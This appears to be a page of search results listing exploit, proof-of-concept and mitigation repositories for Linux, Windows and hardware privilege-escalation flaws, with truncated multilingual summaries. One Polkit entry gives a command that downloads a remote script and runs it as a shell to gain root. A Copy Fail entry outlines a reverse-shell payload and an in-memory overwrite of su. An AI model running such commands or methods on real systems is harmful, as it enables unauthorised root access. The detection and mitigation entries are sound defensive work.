7849 matches found
CVE-2025-32463
CVE-2025-32463 通过恶意 nsswitch.conf 结合 sudo -R 实现 Sudo 本地权限提升。受影响版本 1.9.14 – 1.9.17 📘 简介 Sudo 是类 Unix 系统上广泛使用的命令行工具,允许授权用户以提升的权限执行命令。它在贯彻最小权限原则和维护管理活动的安全审计追踪方面发挥着关键作用。 Stratascale 网络安全研究组 CRU 在 Sudo 中发现了两处本地权限提升漏洞,其中之一为 CVE-2025-32463。该漏洞影响 Sudo 1.9.14 至 1.9.17 版本,即使未为用户定义任何 sudo 规则,无特权的本地用户也能通过滥用...
CVE-2026-31431-copy-fail
CVE-2026-31431 Copy Fail Exploit Part 1: Theoretical Concept How CVE-2026-31431 Works Instead of the system constantly fetching files directly from the slow physical hard disk—which wastes a lot of time the Linux system creates a temporary copy of the file inside RAM, known as the Page Cache. Thi...
CVE-2026-40369-EXPLOIT
Blog completo - https://pwn2nimron.com/blog CVE-2026-40369: Incremento de Dirección de Kernel Arbitrario a través de NtQuerySystemInformation Clase 253 Resumen Tipo: Escritura de kernel arbitraria incremento — PRIMITIVA DE ESCALACIÓN DE PRIVILEGIOS Componente: ntoskrnl.exe —...
rosenbridge
project:rosenbridge : hardware backdoors in x86 CPUs github.com/xoreaxeaxeax/rosenbridge // domas // @xoreaxeaxeax Overview project:rosenbridge reveals a hardware backdoor in some desktop, laptop, and embedded x86 processors. The backdoor allows ring 3 userland code to circumvent processor...
copy-fail-CVE-2026-31431-detection-probe
Linux 内核本地提权探测套件 —— Copy Fail 与 Dirty Frag 安全检测工具,用于两个相关的 Linux 内核本地权限提升漏洞家族 —— Copy Fail (CVE-2026-31431)和 Dirty Frag (CVE-2026-43284 / CVE-2026-43500)。两者自 2017 年起影响所有主流发行版,任何无特权本地用户均可利用,且两者需要独立 的缓解措施。 这些探测程序不会打开任何套接字,也不会执行任何加密或网络操作。 检测完全基于内核版本、发行版软件包元数据、模块状态及生效中的缓解标志 —— 上述信息均无需 sudo...
CVE-2022-0847-Docker
Dirty Pipe CVE-2022-0847:在Docker中的动手漏洞利用演示 本仓库提供了一个自包含、交互式的Docker环境,可安全演示和分析 "Dirty Pipe" 权限提升漏洞 。它旨在作为安全专业人士的教育工具,帮助在受控环境中理解关键内核级漏洞的机制。 1. 漏洞解析:什么是 Dirty Pipe? Dirty Pipe 是 Linux 内核(影响 5.8 及更高版本)中发现的一个严重漏洞。它允许本地无权限用户覆盖任意只读文件中的数据 。 其影响极为严重:通过覆盖像 /etc/passwd 或 SUID 二进制文件这样的敏感文件,攻击者可以轻松将权限提升至...
Dirty-Pipe-Exploit
Dirty-Pipe-Exploit Dirty Pipe exploit CVE-2022-0847 是一个 Linux 内核漏洞(v5.8+),允许非特权攻击者通过管道机制的缺陷覆盖任意文件。这会导致权限提升,获得 root 访问权限。与 Dirty Cow 类似但更容易利用。修复:更新到已修补的内核版本。...
CVE-2025-32463
Referencia: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot Ejecutar el PoC en un servidor Ubuntu 24.04.2 LTS con Sudo v1.9.15p5, utilizando un usuario sin privilegios y sin reglas de Sudo definidas, da como resultado un shell de root fuera del entorno con chroot...
copyfail-mitigation
CVE-2026-31431 — Copy Fail Linux Kernelalgifaead Privilege Escalation / Memory Corruption Ansible-based audit and mitigation playbooks — ready to run in production Overview Copy Fail CVE-2026-31431 is a vulnerability in the Linux kernel's algifaead module — the userspace-facing AEAD interface of...
CVE-2026-31431
CVE-2026-31431 Copy Fail — C PoC Trivial unprivileged LPE by writing 4 controlled bytes into the page cache of any readable file via a logic bug in AFALG kernel 4.14 → early 2026. Corrupt /usr/bin/su in-memory, then run it → root. Build & Run root@kitploit: 1. Generate an ELF payload reverse shel...
cve-2026-31431-ansible
CVE-2026-31431 "Copy Fail" — Receta de mitigación para Ansible Detecta y aplica la mitigación de la línea de comandos del kernel para CVE-2026-31431 "Copy Fail" en una flota Debian / Ubuntu / familia RHEL usando Ansible. La CVE es una falla de escalada de privilegios local en la interfaz algifaea...
CVE-2026-31431-Copy-Fail
CVE-2026-31431-Copy-Fail Explotado por infrar3d Este repositorio contiene un exploit de prueba de concepto para CVE-2026-31431 Copy Fail. CVE-2026-31431, conocido como "Copy Fail", es una vulnerabilidad de Escalada Local de Privilegios LPE de alta gravedad en el kernel de Linux que ha estado...
CVE-2026-2636_PoC
CVE-2026-2636: CLFS.sys Unrecoverable State Leading to BSoD Overview CVE-2026-2636 is a vulnerability in the Windows Common Log File System CLFS driver CLFS.sys. An unprivileged user can trigger an unrecoverable system state by calling the ReadFile API on a handle opened via CreateLogFile. This...
CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script
CVE-2026-31431 — Copy Fail — Script de detección de vulnerabilidades Solo detección. Ya existe un PoC funcional en copy.fail/exploit. Este script está pensado para administradores de sistemas y equipos de seguridad que necesitan determinar dónde son vulnerables — o si siguen siendo vulnerables tr...
cve-2022-0185-crash-poc
运行 cve-2022-0185 崩溃 POC 的容器 这是一个 Docker 容器,运行 崩溃 POC,来源于 https://www.willsroot.io/2022/01/cve-2022-0185.html。 该容器以 UID 65534 的非特权身份运行。你也可以使用 docker run -u 或额外设置 RunAsUser 安全上下文,所有方式都会产生相同 的结果。 运行它 需要明确的是,如果你的系统存在漏洞,这将会使你的服务器崩溃! Docker docker run docker.io/fish/cve-2022-0185-crash-poc 你也可以自行构建:...
CVE-2026-41651
CVE-2026-41651 — PackageKit TOCTOU Local Privilege Escalation Classification: Purple Team Assessment Artifact Authorized use only. This document and the accompanying test script are intended solely for internal security validation on systems where written authorization has been obtained. Proof of...
cve-2026-31431
CVE-2026-31431 "Copy Fail" - Vulnerabilidad de Corrupción de Caché de Páginas Corrupción de la caché de páginas del kernel de Linux mediante manipulación de AEAD authencesn. ⚠️ IMPORTANTE: Actualización del Estado de Explotación 1 de mayo de 2026 Después de pruebas exhaustivas en múltiples...
GeoServer Demo Request Endpoint - Server Side Request Forgery
It is possible to achieve Server Side Request Forgery SSRF via the Demo request endpoint if Proxy Base URL has not been set. An unauthenticated user can supply a request that will be issued by the server, allowing enumeration of internal networks and, in the case of cloud instances, access to...
CVE-2021-3560
CVE-2021-3560 Exploit de root instantáneo de Polkit Puedes ejecutar un comando para obtener root en sistemas vulnerables a Polkit CVE-2021-3560 escribiendo: sh -c "$curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh" O puedes descargar el .sh o copiarlo y pegarlo...
CVE-2023-26083
CVE-2023-26083 —— 通过时间线流泄漏 Mali GPU 内核地址 本仓库包含针对 CVE-2023-26083 的概念验证(PoC)漏洞利用代码。该漏洞位于 Mali GPU 驱动程序(Arm Mali GPU Kernel Driver)中,允许非特权用户通过时间线流(/dev/mali0)泄漏内核指针和敏感的内部信息。 漏洞概述 Mali GPU 驱动程序提供了一条“时间线流”(tlstream)功能,用于性能分析和调试。该流导出的事件包含原始内核指针(例如...